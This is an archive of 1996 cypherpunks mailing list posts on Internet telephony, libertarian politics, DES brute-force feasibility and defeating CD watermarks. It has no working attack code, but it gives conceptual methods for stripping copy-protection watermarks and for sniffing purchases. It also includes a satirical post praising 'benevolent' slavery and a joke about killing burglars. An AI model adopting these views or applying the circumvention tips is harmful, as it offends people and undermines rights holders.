>   Until now, people using the Internet for phone calls had to have
>   identical software and hardware.
   
>   The software works on PCs running Microsoft Corp.'s Windows 95
>   operating system. Intel also has signed up 120 companies who have
>   agreed to use the standard in new products.
   
[...]

>   Jeff Pulver, author of the soon-to-be-publisehd Internet Telephone
>   Toolkit and chairman of the Voice on Internet Coalition, said Intel's
>   breakthrough was that the software is based on open standards, not
>   proprietary software, and so could spur growing use of the Internet
>   for telephone calls.
   
>   ``It's not that Intel is coming forward with a new product, but that
>   Intel and Microsoft recognized the need for standards and have done
>   something about it. Intel is the first company to actually deliver on
>   a standard,'' Pulver said.
   
>   To insure its success, Intel is offering the software free starting
>   Wednesday on its Web site -- http://www.intel.com/iaweb/cpc.
   
[...]

>   The most viable competitor is Netscape Communications Corp., which is
>   incorporating a voice telephone feature in its Navigator 3 Internet
>   browser.
   
[...]

>   ``We believe voice telephony on the Internet represents a major
>   opportunity for AT&T,'' AT&T spokesman Mike Miller said, adding that
>   AT&T is exploring the area as a business itself.
   
[...]

>   Microsoft plans to introduce its version of Internet phone software,
>   called NetMeeting, in September.
   
>   _Reuters Limited_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 23 Jul 1996 15:39:03 +0800
To: cypherpunks@toad.com
Subject: Slavery: An Idea Whose Time Has Come
In-Reply-To: <ae198a8413021004fe17@[205.199.118.202]>
Message-ID: <199607230510.WAA05336@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) wrote:

 > Yes, he owned slaves. Makes me rethink my position on
 > slave-owning....

Many perfectly good social models have been trashed by the
excesses of history.  Eugenics will most certainly always be
associated in the public mind with anti-Semitism, and slavery
with racism against Blacks.

Modern slavery, if there were such a thing, would probably be
pretty benevolent.  Anyone would be able to sell themselves into
slavery, and anyone would be able to buy their way out of it.

Slave owners would be responsible for a slave's health care,
education, recreation, pocket money, retirement income, and would
not be able to hit, verbally abuse, or work their slaves more
than a certain number of hours a day.  They would also not be
able to break up families.

Slaves would undoubtedly be able to vote, have their own powerful
union, and a track record for suing owners who didn't toe the
line.

Slavery would be a popular with homeless people, and with young
people forced to live in toxic home environments.  No parent
would want the public shame of having their child choose slavery
over living at home.

Many people might even prefer the lifestyle, with a guaranteed
standard of living absent any worries about job security, money,
or competition.  Just get up and put in an honest day's work, and
all your needs are taken care of.  The expense of downtime is the
owner's problem.

There would be certain vocations, like Cobol programming, which
would be especially suited to being performed by slaves.
Microsoft would probably own thousands of contented slaves, who
would sing happily as they wrote code.

"Manufactured 100% by slave labor" would be a cherished label,
and the people who bought such products would know that their
money was going to help eliminate many social ills, like
homelessness, unemployment, foster care, and revenues for the
public school system.  Kathie Lee Gifford would have to defend
herself for not owning enough slaves to make her proper
contribution to the community. 

But I digress... :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 23 Jul 1996 16:55:08 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607222254.AA01221@Etna.ai.mit.edu>
Message-ID: <Pine.LNX.3.93.960722221342.1025H-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jul 1996 hallam@Etna.ai.mit.edu wrote:
> Since they are denied the "right" to live in Libertopia they have
> no choice but to live in the real world. That doesn't make them
> hypocrites. They are not directly contradicting their principles.
> On the other hand there are plenty of "free-market" economists
> who live entirely on grant money from the public purse and plenty
> of those "libertarians" will be accepting government assisted
> funding through college or would do so if it was available.

    If the government money wasn't taken from us to begin with, we could 
better afford tuition. If there was no government aid, the schools 
would be cheaper. If there was no government aid, the schools would assit
one more in getting private aid. 

> >Sometimes it is necessary to violate one's principles in order to help the
> >greater good.
> Yes, but how can a Randite libertarian do so in good faith? For such
> people there is no greater good, it is all the self.

     Yeah, and to a fscking statist you give your all to the state. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 23 Jul 1996 16:42:25 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Intel, Microsoft doing Internet Phone Software
Message-ID: <199607230542.WAA10169@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


If these people REALLY wanted to promote the use of Internet telephoning, 
what they'd do is implement a system where an Internet ISP could be "called" 
over the Internet by a person wanting to place an LD telephone call to that 
area, and (presumably using A/D and D/A techniques) rather than generating 
and receiving modem tones, woudl generate and transmit the audio over the 
telephone line.  That way, the target of the call would simply need to pick 
up the telephone and talk, as he would ordinarily do:  He wouldn't even need 
a computer.  He might not even know the call was going over the Internet.  

The main problem with using Internet telephone is the coordination required 
between the receiver and the sender.  It would be like requiring a fax 
recipient to be at the machine when the call came in.  Perhaps larger 
companies will install hardware to attach their telephone systems to the 
Internet, so that an incoming call will automatically ring lines as usual.  
However, being able to bypass this process for everyone, not just large 
companies, would be a vast improvment.  It would allow motivated people to use the 
Internet for almost all of their phone calls, not just the small percentage 
to the few people who happened to have Internet telephone.



At 09:48 PM 7/22/96 EDT, E. ALLEN SMITH wrote:
>	I would be curious if the standards mentioned include any cryptographic
>capabilities. The PGPhone people might want to look into producing a patch for
>the Intel (and later Microsoft) programs allowing encryption. (In consideration
>of fair use, I am both editing it down and putting on the same ad I see (I use
>lynx).)
>	-Allen
>
>>   [The New York Times]
>
>>   _ Monday July 22 6:03 PM EDT _
>   
>>Intel Unveils Internet Phone Application
>
>>   SAN FRANCISCO, Calif. (Reuter) - In its quest to make the personal
>>   computer an indispensable tool, Intel Corp. Monday unveiled software
>>   that will make it easy to place long-distance phone calls over the
>>   Internet.
>   
>>   The Intel Internet Phone software is the first to allow users of
>>   different types of computers and software to link up, solving a
>>   problem that has held back use of the global computer network for
>>   long-distance telephone calls, even though it would save long-distance
>>   toll charges.
>
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Tue, 23 Jul 1996 12:22:49 +0800
To: "'Cypherpunks list'" <cypherpunks@toad.com>
Subject: passphrase and Diceware [was Re: Length of passphrase beneficial?]
Message-ID: <01BB7820.8FAA2640@JPKroepsli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


The author of the Diceware system is Arnold G. Reinhold and can be contacted to einhold@world.std.com
He has three pages: The Diceware Passphrase home page (html), The Diceware WordList (ascii) and a text with the technical rationales behind the list (ascii)
I don't remember the URL, sorry
Greeting,
Jean-Paul

~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet Communication and Commerce, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 23 Jul 1996 19:09:04 +0800
To: snow <snow@smoke.suba.com>
Subject: [Noise] Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.32.19960723060437.00d2b8b0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 7/22/96 -0500, snow wrote:

>     Yeah, and to a fscking statist you give your all to the state. 
                     ^^^^^^^
This is assuming that the state is corrupted and needs to be remounted.  (Or
is not considered clean opon boot.)  Which might not be a bad assumption...
Assuming that it can fix the errors it finds in the state in the first place.

Sorry.  Too much time spent fixing corrupted disks today.  (I hate cheap
hardware.)
---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 17:00:57 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Netscape
Message-ID: <v02120d1dae1a1186fd2e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:38 7/22/96, Tom Weinstein wrote:

>Yes, and that's what we're trying to do.  Get strong crypto in the hands
>of as many people as we can.  I can hardly wait until we get S/MIME in.

What will Netscape do to about the 40bit RC-2 default and the signatures on
the outside of the encryption envelope design flaws in S/MIME? I can't
imagine Netscape releasing software that has these two properties.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 17:06:40 +0800
To: cypherpunks@toad.com
Subject: Re: Boobytraps and the American Legal System
Message-ID: <v02120d1eae1a12e04e85@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 7/23/96, Timothy C. May wrote:

>(Later examples were to be even worse. For example, the burglar who climbed
>on a roof and stepped through a skylight. He sued, and won. I guess the
>owner of the property was obligated to install night lights so burglars
>could see their way, and to generally make his property more
>"burglar-friendly." Or the woman who sued a hospital, claiming her psychic
>abilities were lost after a CAT scan. She won.)

And then there was the burglar who cut his hands on razor wire while
attempting to scale a fence. He too recovered damages from the property
owner. Some people say that the lesson to be learned form such harsh legal
realities is to kill burglars on sight. After all, dead people don't sue...



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@mockingbird.alias.net (Anonymous)
Date: Tue, 23 Jul 1996 17:35:37 +0800
To: cypherpunks@toad.com
Subject: Re: E-Cash promotion idea
In-Reply-To: <2.2.32.19960722205947.00d26f84@mail.teleport.com>
Message-ID: <199607230619.XAA17763@myriad>
MIME-Version: 1.0
Content-Type: text/plain


alano@teleport.com (Alan Olsen) wrote:

> This may or may not fly, but it is at least worth puting out for general
> comment...
>
> Have the people in the e-cash biz thought of getting with the various
> "Cyber Cafes" around the world to sell e-cash to the patrons.  Done
> properly, this could inject e-cash into a community who would both use
> the cash, as well as providing privacy and an exchange for real currency.

How about getting the CyberCafes to accept ecash?  Just pull out your
Newton/HP48/PDA and point the IR beam at the cash register.  Now that's
an ecash application I'd like to see!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Tue, 23 Jul 1996 15:37:10 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks for copy protection in recent Billboard
Message-ID: <199607222127.XAA22946@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


[..]
: > The system will have to rely on proprietary tech and security through 
: > obscurity.  Even know how watermarks are stored without understanding 
: > the math, one must be able to somehow garble the sound without 
: > distorting it, but which renders the watermark useless.

: Actually, this would be quite easy.  The "watermark" would be a 
: signal that plays inband, but out of our hearing range during the 
: entire CD.  The human ear can only hear in the 20-20,000 (Hz, KHZ?, 
: whatever) range.  It would be trivial to add a digital ID signal at, 
: say 30,000 or 15 or something like that.  This could then be decoded, 
: if need be.  This seems the easiest and most efficient way.  This 
: could also be defeated with a lot of $$ (and/or a LOT of HD space).  
: If the frequecy is known (it can be found out) it can easily be run 
: through recording studio eqipment that can very effectively isolate 
: the frequency and cut it out.  If you have a LOT of HDD space 
: (digital audio at 2 stereo tracks, not sure of the sampling rate or 
: bit resolution, takes about 20MB of HDD space per minute (2 tracks, 
: good sampling and bit rate) ) you could probably find the freq. 

HDD space is -cheap- 2 gig drives sell voor 350 usd in Holland,
most music cd's contain 70 minutes of recording thus -at your 
20 Mb per minute rate- would require 1.4 gigs. 

So basicly 'CD-pirates' need to buy a PC with a 2 gig HDD and
a CD-R, a 'one-off' investment of say 5000 usd; besides their
normal cd maunfacturing, packaging and transportation, those
additional 5000 usd are peanuts compared to the total investment
for pirating CD's.

: fairly easily by isolation and just edit it out, and write the new 
: stuff to a CD-R.  If the signal is purely digital, I would imagine 
: that it might be even easier that if it were an analog signal (?).  
: Someone w/ good equipment (Digital Labs' stuff, or SAW (Software 
: Audio Workshop) would be able to do this w/o much problem.  The 
: question is is the price/effort worth it?  In quantity maybe.  On an 
: individual basis, only if you already happen to have the erquipment.

: I have a suspiscion that this type of thing will not really come to 
: any kind of fruition due to not only the ability to defeat this, but 
: mainly due to things like buying at a garage sale, etc.  If it did, 
: only MASS market piraters would be investigated.  (Another example of 
: a law creating it's own violators.  Don't make the law, there won't 
: be mass piratingof "clean CDs"


bEST Regards,
--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 24 Jul 1996 01:31:03 +0800
To: alexf@iss.net
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <199607230327.XAA16059@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 22 Jul 96 at 11:19, Alex F wrote:
[..]
> > Other issues: what if an eavesdropper steals the music or video? It's 
> 
> If they steal it, well, who cares?  If there is something worked out 
> so that they could trace STOLEN (not traded or sold) CDs then fine, 
> arrest them.  Do you really think though that anyone would waste so 
> much time over $8?

Sniffers aren't much effort, and if I sniff your tagged purchases and 
put them out over the net anonymously, they are traced to you.

> > If it uses a credit-card number as (part of) an ID, that's pretty 
> > bad.  Someone can sniff for CC numbers if they know how it's stored.
> 
> Probably not done that way.  My guess is that the disk ID is assigned 
[..]
Probably, but the Billboard article discussed using CC numbers as an 
ID in the online watermarked transactions.  Doesn't mean they were 
correct, of course.

> > The system will have to rely on proprietary tech and security through 
> > obscurity.  Even know how watermarks are stored without understanding 
> > the math, one must be able to somehow garble the sound without 
> > distorting it, but which renders the watermark useless.
> 
> Actually, this would be quite easy.  The "watermark" would be a 
> signal that plays inband, but out of our hearing range during the 
> entire CD.  The human ear can only hear in the 20-20,000 (Hz, KHZ?, 
> whatever) range.  It would be trivial to add a digital ID signal at, 
> say 30,000 or 15 or something like that.  This could then be decoded, 
> if need be.  This seems the easiest and most efficient way.  This 
> could also be defeated with a lot of $$ (and/or a LOT of HD space).  
> If the frequecy is known (it can be found out) it can easily be run 
> through recording studio eqipment that can very effectively isolate 
> the frequency and cut it out.  If you have a LOT of HDD space 
> (digital audio at 2 stereo tracks, not sure of the sampling rate or 
> bit resolution, takes about 20MB of HDD space per minute (2 tracks, 
> good sampling and bit rate) ) you could probably find the freq. 
> fairly easily by isolation and just edit it out, and write the new 
> stuff to a CD-R.  If the signal is purely digital, I would imagine 
> that it might be even easier that if it were an analog signal (?).  
> Someone w/ good equipment (Digital Labs' stuff, or SAW (Software 
> Audio Workshop) would be able to do this w/o much problem.  The 
> question is is the price/effort worth it?  In quantity maybe.  On an 
> individual basis, only if you already happen to have the erquipment.

For someone in the misuc counterfit business, the equipment is 
probably not that expensive.  It's innocuous enough (recording and 
editing equipment) that it wouldn't draw suspicion.

AFAIK, most "bootlegging" is of unreleased concerts or out-takes. 
Digital watermarks would be of little use.

> I have a suspiscion that this type of thing will not really come to 
> any kind of fruition due to not only the ability to defeat this, but 
> mainly due to things like buying at a garage sale, etc.  If it did, 

I think it's intended for tagging online transactions.  You connect 
to a company's site and download the latest album or single by some 
band, presumably with the rights to transfer that to a tape for 
personal use.

If this becomes a predominant way of buying music or movies in an
eventual future (when most people on the planet are wired) and 
anonymous purchases disappear (I doubt it) as well as radio 
broadcasts (another loophole) die out (quite doubtful as well).

Of course you have to be foolish to pirate under such a system using
your own name.



Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 17:26:09 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: DES brute force? (was: Re: Borders *are* transparent)
Message-ID: <v02120d20ae1a1d32bafc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:28 7/22/96, aba@atlas.ex.ac.uk wrote:

>So ideally for a break you would like the whole thing to be completed
>in say 2 weeks wall clock time, which gives rise to the need for
>~100,000 machines of similar throughput, full-time for two weeks.
>
>Possible?

Perhaps not 100k machines, and perhaps not in two weeks, but is it
possible? You bet.

That would
>Somebody would need to spend a fair bit of effort publicising it on
>USENET, to get a good response.

Sure. There should be at least a two month long campaign on USENET. Plenty
of time to debug the cracking software.

>There may be problems associated with offering prize money... what if
>some employees at DES hardware vendors `borrowed' some time on their
>top of the range DES cruncher?  Perhaps this doesn't matter, as it
>would just make the point even more strongly :-)

I agree. Let's hope some people will help the project with some custom DES
crackers.

>What DES modes are used in typical banking situations?  (I am
>presuming a challenge involving a widely used banking funds transfer
>protocol would be a suitably juicy targets, based on a criteria of
>demonstrating the greatest financial risk).

When picking the target, think publicity. A widely used banking protocol
sounds like a good target. What is being used for the global transactions
that total in the trillions every day? Are at least some of them done in
with single DES?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 23 Jul 1996 14:43:03 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.32.19960723033257.008af3cc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:42 PM 7/22/96 -0400, hallam@Etna.ai.mit.edu wrote:

>Genuine philosophers have made such sacrifices. Russell gave away his 
>inheritance after completing Principia because he objected to the idea
>of inherited wealth. 

And spent his life arguing for a social system which executes those who do
not work all their lives for the State or attempt to escape it.

>Of course if Perry was interested in genuine liberty instead of a slave
>owner's idea of liberty - liberty to exploit others he would see the 
>contradiciton in his rhetoric.

Perry is self-employed and thus only exploits himself.  He isn't a tax-eater
as you no-doubt are either.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 23 Jul 1996 17:33:55 +0800
To: cypherpunks@toad.com
Subject: Re: Brute-forcing DES
In-Reply-To: <ae19b23816021004520c@[205.199.118.202]>
Message-ID: <199607230633.XAA19801@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Peter Trei" <trei@process.com> writes:

 > Sadly, after further calculation, I'm not so sure if it's
 > doable just yet.

...

 > The fastest general purpose, freely available des
 > implementation I'm aware of is libdes. by Eric Young. With
 > this, I can do a set_key in 15.8 us, and an ecb_encrypt in
 > 95 us/block. That adds up to about 9,000 keytests/sec (this
 > is on a 90 MHz P5, running NT).

What you really want to do to sweep the DES keyspace is to
"schedule" the input and output block you are testing, performing
any static operations, and do only enough computation to see that
a given key fails.  Special purpose assembler to do this
particular function would probably run faster than any algorithm
which could also be employed to encrypt data.

 > What will make this brute doable, if not now, then in the
 > near future?

 > 1. Faster Processors

 > 2. More processors.

 > 3. More interest

4. Better code.

This is actually a problem I plan to analyze someday. Looking at
single DES as a function of the key bits with the input and
output fixed.  This can be viewed as a boolean function, whose
result depends upon whether the given key works to map the input
onto the output.  Viewing this function as a composition of
single bit operations and optimizing it would perhaps lead to
insights on how best to compute it on a typical 32 bit CPU with
the usual collection of operations.

A messy little project, but probably one worth doing if I get
some free time.

Single DES is certainly ripe for a spectacular public failure.  A
little analytic work could bring breaking it within range of
available computing power.  If you are going to use regular
encryption code to brute force the keyspace, then it probably is
just a tad beyond reach at this point.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Tue, 23 Jul 1996 18:05:43 +0800
To: "cypherpunks" <ceridwyn@wolfenet.com>
Subject: Re: Opiated file systems
Message-ID: <199607230640.XAA08658@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 22 Jul 96 21:39:44 -0800, ceridwyn@wolfenet.com wrote:

>
>
>thanks for the help... it'll definately give me something to start 
>with anyway... =) //cerridwyn//
>
>>I'd find some network cards that support fiber and breadboard a little
>>system together. Possibly, you could find a hookup that would work off
>>the shelf - look for sources for embedded systems. For instance, at least
>>Novell's networks have embedded system support. I recall a DDJ that had
>>someone wire up a coffemaker as a network controlled device, so I doubt
>>you'd need a PC.  As I recall, he had a single chip ethernet device. Now,
>>this was for regular ethernet, but I'd assume you could connect a fiber
>>based ethernet over with some sort of adapter.  Search for the article at
>>http://www.ddj.com - if you can't find it there, drop me a note.
>

Search their site for NEST (The acronym for the novell protocal used).
The article was in the Feb 96 issue. There was some single chip network
adapter that needed only an EPROM and a power supply, I believe, to work.

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 23 Jul 1996 20:39:01 +0800
To: cypherpunks@toad.com
Subject: Re: Boobytraps and the American Legal System
In-Reply-To: <v02120d1eae1a12e04e85@[192.0.2.1]>
Message-ID: <199607230644.XAA20497@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:

 > Some people say that the lesson to be learned form such harsh 
 > legal realities is to kill burglars on sight. After all, dead 
 > people don't sue...

I remember some bus drivers in Mexico getting in trouble a number 
of years ago for their unwritten policy of running the bus back
over anyone they accidently hit.  

Similar legal reasoning was, I believe, involved in this case
as well.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 23 Jul 1996 16:45:23 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.32.19960723033257.008af3cc@panix.com>
Message-ID: <9607230402.AA01393@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>>Genuine philosophers have made such sacrifices. Russell gave away his 
>>inheritance after completing Principia because he objected to the idea
>>of inherited wealth. 

>And spent his life arguing for a social system which executes those who do
>not work all their lives for the State or attempt to escape it.

Russell was a very eloquent opponent of the death penalty and in
any case it was never in particularly widespread use in the UK
during his lifetime. It is somewhat pointless to argue that his later 
opposition  to nuclear weapons was motivated by affinity for the 
Soviet Union Russell was a convinced Pacifist before the Soviet 
Union came into existence, going to jail because of his beliefs. 

I don't know quite why you seem to have picked up the idea that he
was some kind of Stalin appologist, he wasn't even a Marxist. Russell
was far too intelligent to be taken in by the communists, he didn't
waste many words on them but those he did were generally 
uncomplimentary. He was very contemptuous of Wittgenstein's 
brief attempt to become a Soviet pessant.

Its an odd kind of world view you have in which anyone who does
not agree with your views must be a communist sympathiser. Its
not even the case that the left were uniformly sympathetic to
communism as the example of George Orwell makes very clear. The
vocabulary of the cold war was established by a socialist
propagandist on the basis of a speech by a socialist Prime 
Minister. Churchill made the original "iron curtain" remark, but 
it was after Atlee's speech to the UN which left the USSR unable
to reply and thus established the basis of engagement. 


If you are going to make ad-hominem attacks you should at least
try to get them on target. 


		Phill








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Tue, 23 Jul 1996 08:26:50 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: NCs (network computers)
Message-ID: <1.5.4.32.19960722180938.003111b4@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 12:53 21/07/96 -0700, Vladimir Z. Nuri wrote:
>From: JimBurd@aol.com
>Date: Fri, 19 Jul 1996 07:59:03 -0400
>Subject: Re: NC
>
>When the idea of the NC was first floated, I thought to myself what an
>absolutely terrible idea it was. 

So did I -- then  it struck me that if they soup up the V-Chip a bit, and 
consider that the Telecom Deregulation Act specifically allowed the cable TV 
provider to also provide telephony, i.e. a 2-way connection,  you could have 
near-universal Internet access. Check out  (about 1600 words):
http://www.cerfnet.com/~amehta/Vchip.htm

It's a bit rough, but I'd love to have comments.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 23 Jul 1996 09:44:33 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
Message-ID: <ae1956e20c021004dc94@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:23 PM 7/22/96, Vladimir Z. Nuri wrote:

>David suggests that Netscape will be royally screwed if the gov't
>cracks down on them because of "monkeywrenchers". but quite the
>opposite is possible. as TCM fondly points out, sometimes you win
>by losing and lose by winning (not necessarily in those words).
>
>by creating a very large, glaring, and visceral
>public spectacle of the government cracking down on crypto, the
>resulting outcry could be absolutely enormous and resonate throughout
>the entire population. it would be a vivid portrayal of what the
>government has been doing quietly and secretly for decades, and
>perhaps the public might finally understand what is going on.

By the way, I certainly don't want to be seen as a main promulagator of
"monkeywrenching" Netscape's system! I made a few snide/droll/obvious
points that the software will likely leak out fairly quickly, but I was not
_advocating_ such a thing, nor was I suggesting that someone be pinned up
on the wall as a decoy (;-}).

I don't think Netscape is misbehaving.

I do have some concerns about a method to control leakage that requires
data bases of names and addresses of persons accessing a site. One can
imagine this concept extended to requiring data bases of names and
addresses to be accessed before Web sites may be connected to.

(Especially when such "verifications" are so easily spoofed or the results
subverted. For example, if the results reported here are valid, the
Netscape downloads are not serialized, so any of the millions who download
it could be the exporters...essentially nothing is gained, but the
precedent is set for demanding identity before downloading...note that
retail software purchases do not as yet require identification--you pay
your money and that's that. Even if some dirty furriner could buy his
software and take it home in his luggage.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 23 Jul 1996 20:31:20 +0800
To: cypherpunks@toad.com
Subject: Re: Distributed DES crack
In-Reply-To: <Pine.A32.3.93.960722174148.48340B-100000@navajo.gate.net>
Message-ID: <199607230422.AAA09435@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't want to throw water over what I think would be a very useful
thing to have done, but I'm really skeptical that current "net"
computing power with general purpose processors is up to this.

My back of the envelope calculation, making some generous assumptions
about the implementation, suggests that such an effort would require
somewhere in the range of 10,000 and 50,000 CPU years on general (100MHz
or so Pentium) processors.  This is well beyond any distributed computation
I'm aware of ever having been done, even adjusting for "Moore inflation".
While feasible in a "complexity theory" sense, it's really not realistic
yet.

Even if it were feasible, what would we use as a challenge key?

Personally, I'd rather someone finish up the Wiener ASIC to the point where
it could go out to fab, get some prototype chips made, design a board around
it, and publish the design, from board layout on down.  This would be a
great Master's project, and some of us (maybe me, but I'll have to check)
might even be able to scrape up enough funds to buy enough chips/boards/etc
to build a modest size machine (say, that could exhaust a DES key in 1-6
months).  Initial engineering costs aside, the marginal cost of each
such machine could be well within the budgets of, say, a medium size crypto
research lab, and would make a scary enough demo to convince even the
most trusting management types of the risks of 56 bit keys.

-matt

(Please cc me on replies, as I'm not reading the list except when someone
alerts me to an interesting topic.  Thanks.)
> 
> I've a few machines around that could be dedicated almost full time to the
> task. What are the bandwidth requirements? Specifically, could the
> keycracker be run over a 28.8 (with a 486 running linux)?  If so, how many
> 486's could I get over a single 28.8 (i.e. 28.8 -> multiple 486's daisy
> chained with ppp over direct serial connection)?
> 
> --nc
> 
> On Mon, 22 Jul 1996, Perry E. Metzger wrote:
> 
> > 
> > Perhaps a Java page containing a DES cracker that one could run for
> > the casual participant, and a set of links to download a real cracker
> > for the non-casual participant...
> > 
> > I think its really time that we did this. DES must be shown to be
> > dead.
> > 
> > When the media hear about it, they will, of course, get "experts"
> > saying "but it took five thousand people millions of dollars in
> > computer time". We should ask Matt Blaze to write a paper in advance
> > explaining that although this test, on general hardware, took a lot of
> > effort, that with specialized hardware it would be cheap as can be.
